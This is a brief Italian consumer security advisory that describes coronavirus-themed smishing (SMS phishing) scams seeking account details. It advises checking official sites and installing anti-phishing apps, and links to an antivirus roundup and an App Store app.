Un attacco smishing è un attacco di phishing che utilizza SMS invece di messaggi e-mail per effettuare l’attacco. I truffatori aggiungono ora un tocco di coronavirus a questo tipo di truffa già sperimentata. Questo tipo di attacchi in genere cerca di ingannare chiunque risponda a fornire informazioni sul conto come condizione per richiedere il pagamento o i punti offerti.  

Soluzione Tecnica Consultare i siti ufficiali dei soggetti coinvolti , o citati nei link del testo dell’SMS. Dotarsi delle APP- IOS e Android anti Phishing  

https://it.safetydetectives.com/blog/i-migliori-antivirus-veramente-gratuiti-per-android/

https://apps.apple.com/us/app/anti-phishing-identity-guard/id1136376302